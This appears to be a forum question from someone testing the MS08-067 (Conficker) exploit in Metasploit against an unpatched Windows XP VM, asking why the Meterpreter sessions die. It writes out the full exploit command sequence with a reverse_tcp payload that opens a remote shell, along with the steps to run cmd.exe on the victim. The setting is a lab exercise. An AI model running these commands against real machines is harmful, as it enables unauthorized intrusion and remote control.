I've got an SP0/unpatched Windows XP which is vulnerable to the Conficker worm. I'm using metasploit to use the Conficker exploit with the purpose of opening a remote shell/command line.
My Metasploit script is the following one:
use exploit/windows/smb/ms08_067_netapi
set RHOST <vulnerable_win_xp_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacking_kali_host_ip>
set LPORT <local_port>
exploit -j -z
In my case, I have machines with address in 192.168.239.*
and LPORT = 443
.
In this way, I should be able to open a session with the remote vulnerable machine (sessions -i 1
), thus executing the command line application (execute -i -f cmd.exe
) and obtaining a remote command line.
Nevertheless, when I execute the script, although I get Meterpreter opening a session with the victim, this session is closed (Reason: Died) after a few seconds.
I've found that it could be related to the fact I'm using two VMWare Virtual Machines during my test.
As suggested, I tried with set InitialAutoRunScript migrate -f
, but nothing changes.
How can I prevent Meterpreter sessions to be closed?
And, most importantly, why are they closed?